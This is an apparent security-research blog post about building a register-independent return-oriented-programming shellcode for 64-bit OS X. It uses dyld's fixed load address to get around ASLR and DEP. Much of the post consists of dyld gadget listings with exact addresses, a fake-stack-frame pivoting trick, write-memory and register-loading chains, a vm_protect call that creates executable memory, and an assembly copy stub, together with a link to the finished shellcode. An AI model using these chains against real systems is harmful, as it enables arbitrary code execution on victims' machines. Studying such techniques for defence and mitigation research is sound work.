One of the hurdles one will encounter during OS X exploitation is ASLR/DEP combination for 64-bit processes (32bit don’t have DEP [1]). When implemented correctly, it’s an effective mitigation, which can be circumvented only with an info leak. (Un)fortunately, OS X versions up to recent Lion (10.7) offer only incomplete ASLR which still allows attackers to succeed in their efforts to execute arbitrary code. One of the problems (among others) is dyld (dynamic loader) image being located at the same address in every process. This makes ROP possible — by controlling the stack, we can reuse snippets of code from dyld and, in effect, execute arbitrary code.

The only public ROP dyld shellcode for OS X was presented in [1]. Charlie Miller’s version works under the assumption that that rax/rdi have specific values. Due to x64 calling convention [2] it is very probable that this precondition is met. Nevertheless it would be useful to create a shellcode with weaker assumptions — that’s exactly what this post is about. We will create a generic ROP shellcode, similiar to sayonara, but for OS X :).

Stack pivoting

We assume that rsp is fully controlled. Sometimes, achieving such state is a nontrivial task in itself — for every bug, exploitation can begin with different register/memory values. In [1], an easy case of stack pivoting is described — we start with rax pointing to controlled memory, and rdi to a valid buffer. We then set rsp = rax with:

0x00007fff5fc24c8b mov QWORD PTR [rdi+0x38],rax (irrelevant) 0x00007fff5fc24cd8 mov rsp,QWORD PTR [rdi+0x38] 0x00007fff5fc24cdc pop rdi 0x00007fff5fc24cdd ret

Easy! The problem is, we might not be so lucky to start with rax pointing to fully controlled memory. For example, we may start with the following:

call [rax+0x100]

Where memory in range [rax, rax+0xF0] is random, and we control buffer starting at rax+0xF1. Starting conditions for every bug are different and pivoting the stack can be even harder than creating a ROP chain, since during pivoting the state we start with can be completely arbitrary, when during ROP we already control the stack.

There is no generic way to remedy this problem, but having a large database of usable gadgets would certainly help :). That brings us to an annoying problem: “leave” instruction. “Leave” is equivalent to:

mov rsp, rbp pop rbp

If we don’t control rbp, we will lose control of the stack. The problem is, “leave” is very often present before “ret”, effectively limiting the number of gadgets we can use.

Fortunately, there is a little trick that will allow us to use any “leave” gadget. We need to create a “fake” stack frame with a series of 3 indirect calls, like so:

call [rax]+------------+ (...)<--------------+ | call [rax+4]+ | | | | +----> push rbp | | mov rbp, rsp +-----------+ | (...) | | call [rax+8]+ | | | +-->continue | +--------------+ | | | | | +->(gadget) | leave +--------+ret

Start from call [rax] and follow the execution flow along the arrows. With such construct, we can safely call any gadget ending with “leave / ret”. Such sequences (two indirect calls with different displacements near each other) may be rare, but we don’t need many of them, one is sufficient. We can use the second call (call [rax+4]) to jump to a sequence that will perturb rax and then jump back to “call [rax]”, allowing us to use the same “dispatcher” gadget as many times as we need to use a “leaver”. Here’s an example of such dispatcher, from dyld:

DISPATCHER: __text:00007FFF5FC0D1BF call qword ptr [rax+78h] __text:00007FFF5FC0D1C2 mov rsi, rax __text:00007FFF5FC0D1C5 test rax, rax __text:00007FFF5FC0D1C8 jz short loc_7FFF5FC0D1E0 __text:00007FFF5FC0D1CA mov rax, [rbx] __text:00007FFF5FC0D1CD mov rcx, rbx __text:00007FFF5FC0D1D0 mov rdx, r12 __text:00007FFF5FC0D1D3 mov rdi, rbx __text:00007FFF5FC0D1D6 call qword ptr [rax+80h] FAKE FRAME SETUP: __text:00007FFF5FC0CD44 push rbp __text:00007FFF5FC0CD45 mov rbp, rsp __text:00007FFF5FC0CD48 mov [rbp+var_18], rbx __text:00007FFF5FC0CD4C mov [rbp+var_10], r12 __text:00007FFF5FC0CD50 mov [rbp+var_8], r13 __text:00007FFF5FC0CD54 sub rsp, 20h __text:00007FFF5FC0CD58 mov r12, rdi __text:00007FFF5FC0CD5B mov r13d, esi __text:00007FFF5FC0CD5E mov rax, [rdi] __text:00007FFF5FC0CD61 call qword ptr [rax+1A0h]

Few preconditions related to register values must be met, for the gadgets above to work. Since we don’t control the stack during pivoting, we need to use gadgets ending with indirect jumps, or calls, to set registers and memory to necessary values.

“Leave” problem is particulary crippling during pivoting and that’s when fake frames should be used. During ROP, it’s easier to just control rbp and point it to memory set earlier.

ROP

Plan is simple: use gadgets from dyld to create RWX memory area (using vm_protect), then copy normal shellcode to that area, and jump to it.

Here’s the vm_protect call we will use to make memory from dyld’s .data section executable:

__text:00007FFF5FC0D34A mov r8d, ebx ; new_protection __text:00007FFF5FC0D34D xor ecx, ecx ; set_maximum __text:00007FFF5FC0D34F mov rdx, rax ; size __text:00007FFF5FC0D352 mov rsi, [rbp+address] ; address __text:00007FFF5FC0D356 lea rax, _mach_task_self_ __text:00007FFF5FC0D35D mov edi, [rax] ; target_task __text:00007FFF5FC0D35F call _vm_protect __text:00007FFF5FC0D364 test eax, eax __text:00007FFF5FC0D366 jz short loc_7FFF5FC0D38D __text:00007FFF5FC0D38D loc_7FFF5FC0D38D: __text:00007FFF5FC0D38D cmp byte ptr [r12+0FAh], 0 __text:00007FFF5FC0D396 jz short loc_7FFF5FC0D406 __text:00007FFF5FC0D406 loc_7FFF5FC0D406: __text:00007FFF5FC0D406 mov rbx, [rbp+var_28] __text:00007FFF5FC0D40A mov r12, [rbp+var_20] __text:00007FFF5FC0D40E mov r13, [rbp+var_18] __text:00007FFF5FC0D412 mov r14, [rbp+var_10] __text:00007FFF5FC0D416 mov r15, [rbp+var_8] __text:00007FFF5FC0D41A leave __text:00007FFF5FC0D41B retn

This is the same technique as in [1]. Few registers need to be set for this to work: registers used as parameters for vm_protect and rbp, to survive “leave / ret” at the end. We can set them one by one, jumping over different gadgets like described in [1], or set them all at once, using the following:

__text:00007FFF5FC24CA1 mov rax, [rdi] __text:00007FFF5FC24CA4 mov rbx, [rdi+8] __text:00007FFF5FC24CA8 mov rcx, [rdi+10h] __text:00007FFF5FC24CAC mov rdx, [rdi+18h] __text:00007FFF5FC24CB0 mov rsi, [rdi+28h] __text:00007FFF5FC24CB4 mov rbp, [rdi+30h] __text:00007FFF5FC24CB8 mov r8, [rdi+40h] __text:00007FFF5FC24CBC mov r9, [rdi+48h] __text:00007FFF5FC24CC0 mov r10, [rdi+50h] __text:00007FFF5FC24CC4 mov r11, [rdi+58h] __text:00007FFF5FC24CC8 mov r12, [rdi+60h] __text:00007FFF5FC24CCC mov r13, [rdi+68h] __text:00007FFF5FC24CD0 mov r14, [rdi+70h] __text:00007FFF5FC24CD4 mov r15, [rdi+78h] __text:00007FFF5FC24CD8 mov rsp, [rdi+38h] __text:00007FFF5FC24CDC pop rdi __text:00007FFF5FC24CDD retn

We can fill a buffer from dyld’s .data section with values we want to set registers with and simply call the above gadget. The only problem with this approach is rsp being overwritten (mov rsp, [rdi+38h]), but we can remedy this by creating a “fake” stack somewhere in memory :).

Below is a WRITE MEM gadget sequence we can use.

__text:00007FFF5FC23373 pop rbx __text:00007FFF5FC23374 retn __text:00007FFF5FC24CDC pop rdi __text:00007FFF5FC24CDD retn __text:00007FFF5FC24CE1 mov [rdi+8], rbx __text:00007FFF5FC24CE5 mov [rdi+10h], rcx __text:00007FFF5FC24CE9 mov [rdi+18h], rdx __text:00007FFF5FC24CED mov [rdi+20h], rdi __text:00007FFF5FC24CF1 mov [rdi+28h], rsi __text:00007FFF5FC24CF5 mov [rdi+30h], rbp __text:00007FFF5FC24CF9 mov [rdi+38h], rsp __text:00007FFF5FC24CFD add qword ptr [rdi+38h], 8 __text:00007FFF5FC24D02 mov [rdi+40h], r8 __text:00007FFF5FC24D06 mov [rdi+48h], r9 __text:00007FFF5FC24D0A mov [rdi+50h], r10 __text:00007FFF5FC24D0E mov [rdi+58h], r11 __text:00007FFF5FC24D12 mov [rdi+60h], r12 __text:00007FFF5FC24D16 mov [rdi+68h], r13 __text:00007FFF5FC24D1A mov [rdi+70h], r14 __text:00007FFF5FC24D1E mov [rdi+78h], r15 __text:00007FFF5FC24D22 mov rsi, [rsp+0] __text:00007FFF5FC24D26 mov [rdi+80h], rsi __text:00007FFF5FC24D2D retn

First we pop the value, then the address and finally set memory with “mov [rdi+8], rbx”. Notice that we also trash values higher is memory, from rdi+0x10, to rdi+0x80, so we need to remember to write to LOWER addresses first.

We could copy our “normal shellcode” to RWX memory using the above sequence, but it would be wasteful in terms of stack space. Observe that to copy a single QWORD, we need 5 QWORDs on the stack (3 gadgets, address, value). It’s more efficient to create a small “stub” that will take care of this.

; copy normal shellcode to RWX area ; size = 0x1000 stub: lea rsi, [r15+offset] xor rcx, rcx inc rcx shl rcx, 12 lea rdi, [rel normal_shellcode] ;rip relative addressing rep movsb normal_shellcode:

rsi is set to point to old stack (passed in r15), normal shellcode starts from a constant offset. We save a bit of space using rip-relative addressing (x64 feature) to set rdi, rather than a constant 8-byte address.

To summarize:

set register values in dyld’s .data buffer

create a fake stack and a fake stack frame in memory

copy stub to future RWX area

set all registers to correct values

use vm_protect to create RWX area

load r15 with previous stack pointer

jump to RWX memory

stub will copy our “normal” shellcode from old stack to RWX mem

???

PROFIT!

That’s it. The resulting ROP shellcode is bigger than the one in [1], but it doesn’t assume anything about registers. There is room for improvement, but in environments where you can spray megabytes of memory with javascript (like in Safari ;)), size of shellcode is not critical.

You can download the final version here.

References:

[1] Charlie Miller, Mac OS X Hacking (Snow Leopard Edition), 2010

[2] Jon Larimer, Intro to x64 Reversing, 2011